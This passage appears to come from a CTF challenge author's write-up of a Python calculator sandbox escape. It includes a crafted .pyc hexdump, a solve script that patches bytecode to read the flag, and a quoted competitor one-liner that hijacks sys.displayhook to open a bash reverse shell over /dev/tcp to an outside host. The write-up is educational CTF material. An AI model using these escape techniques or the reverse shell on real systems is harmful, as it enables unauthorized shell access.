00000040  a1 01 01 00 64 01 53 00  29 03 69 00 00 00 00 4e  |....d.S.).i....N|
00000050  7a 04 6c 73 20 2f 29 02  5a 05 70 6f 73 69 78 5a  |z.ls /).Z.posixZ|
00000060  06 73 79 73 74 65 6d 29  00 29 00 29 00 7a 14 69  |.system).).).z.i|
00000070  44 52 69 35 4d 77 36 79  58 49 34 58 63 54 48 66  |DRi5Mw6yXI4XcTHf|
00000080  68 32 41 5a 08 3c 6d 6f  64 75 6c 65 3e 01 00 00  |h2AZ.<module>...|
00000090  00 73 02 00 00 00 08 01                           |.s......|
00000098
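The 26 bytes of co_code in that dump can be decoded by hand. The sketch below hardcodes the CPython 3.9 opcode numbers it needs; the interesting detail appears to be the NOP instructions, whose 0xc3 argument acts as a UTF-8 lead byte for the following 0xa0 (LOAD_METHOD) and 0xa1 (CALL_METHOD).

```python
# Opcode numbers from CPython 3.9's opcode.h (only the ones used here).
OPNAMES = {1: "POP_TOP", 9: "NOP", 83: "RETURN_VALUE", 90: "STORE_NAME",
           100: "LOAD_CONST", 101: "LOAD_NAME", 108: "IMPORT_NAME",
           160: "LOAD_METHOD", 161: "CALL_METHOD"}

# co_code copied from offsets 0x2e to 0x47 of the dump above.
co_code = bytes.fromhex(
    "6400 6401 6c00 5a00 6500 09c3 a001 6402 09c3 a101 0100 6401 5300")

co_code.decode("utf-8")   # raises UnicodeDecodeError if not UTF-8 clean

# Each instruction is an (opcode, argument) byte pair.
listing = [(OPNAMES[op], arg) for op, arg in zip(co_code[::2], co_code[1::2])]
for name, arg in listing:
    print(f"{name:<13} {arg:#04x}")
```

Read top to bottom, this is import posix followed by posix.system("ls /"), with the constants and names taken from the tuples that follow co_code in the file.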

And the rest of the solve script:

run(b"e.pyc", open("flag.pyc", "rb").read().replace(b"iDRi5Mw6yXI4XcTHfh2A", frozen.encode("utf-8"))+b"\n")
flag = "/flag."+re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])').sub('', run(b"f", b"import e\n")).split("flag.")[1].split(".")[0]+".txt"
run(b"g.pyc", open("flag.pyc", "rb").read().replace(b"iDRi5Mw6yXI4XcTHfh2A", frozen.encode("utf-8")).replace(b"z\x04ls /", b"z"+bytes((4+len(flag),))+b"cat "+flag.encode("utf-8"))+b"\n")
print(run(b"h", b"import g\n"))

And, finally, the flag:

[kmh@kmh solve]$ python3 solve.py 
Welcome to the TI-1337 Plus CE!
Enter your username: 1. Start new session
2. Restore session
What would you like to do? Session name: You can use variables and math operations. Results of expressions will be outputted.
Enter your calculations: 
> > dice{a_ja1lbr0k3n_calcul4t0r?!}

All that work was unnecessary…

justCatTheFish blew my mind with this solution:

from sys import __dict__ as sysd
from __main__ import __dict__ as myd
from posix import system as displayhook; sysd |= myd; 'bash -c "bash -i >& /dev/tcp/xx.xx.xx.xx/nnnn 0>&1"';

Another clever use of IMPORT_FROM! By importing __dict__ from the main module (which contains variables you assign) and from another module and OR-ing them together with |=, you can write into the namespace of the other module. The function the Python REPL uses to print results is a global in the sys module (sys.displayhook), so changing that to posix.system pops a shell. I’m super happy with this as an unintended solution and not disappointed at all.
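The displayhook half of the trick can be tried safely by swapping in a harmless function instead of posix.system. This is an illustrative sketch of the mechanism, not their exploit; the list named shown is just a stand-in that records what the hook receives.

```python
import sys

shown = []
original_hook = sys.displayhook

# Write into the sys namespace through its __dict__, as the exploit does.
from sys import __dict__ as sysd
sysd |= {"displayhook": shown.append}   # dict |= needs Python 3.9+

try:
    # "single" mode is what the REPL uses: expression results go to the hook.
    exec(compile("'hello from the REPL'", "<demo>", "single"))
finally:
    sys.displayhook = original_hook

print(shown)
```

With posix.system installed as the hook, the bare string expression at the end of their third line is what gets executed as a shell command.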

Their full write-up and thought process, which you should totally read, is available here. They even wrote a tool to generate UTF-8 pyc files!

disconnect3d from justCatTheFish also pointed out that you could use an evil .so without importing it because interactive CPython automatically attempts to load a readline module from the current working directory. So really the challenge only needed to allow file writing or imports to be solvable!

Reflections

This was the first CTF I’ve helped organize that had more than a couple top teams playing, and it was super gratifying to have them work on and solve my challenge. Despite the solves being unintended, I’m not sure their solutions were significantly easier than mine, considering it got the same number of solves as a kernel pwn. I also don’t know how I would remove the possibility of the shared object approach—I tried to make the challenge setup reasonably motivated by the premise, and I don’t want to add random patches for the sole purpose of eliminating other solution paths. Challenges that are exploratory and allow for multiple approaches are often cooler anyway.

Ultimately, I believe TI-1337 Plus CE lived up to the hype!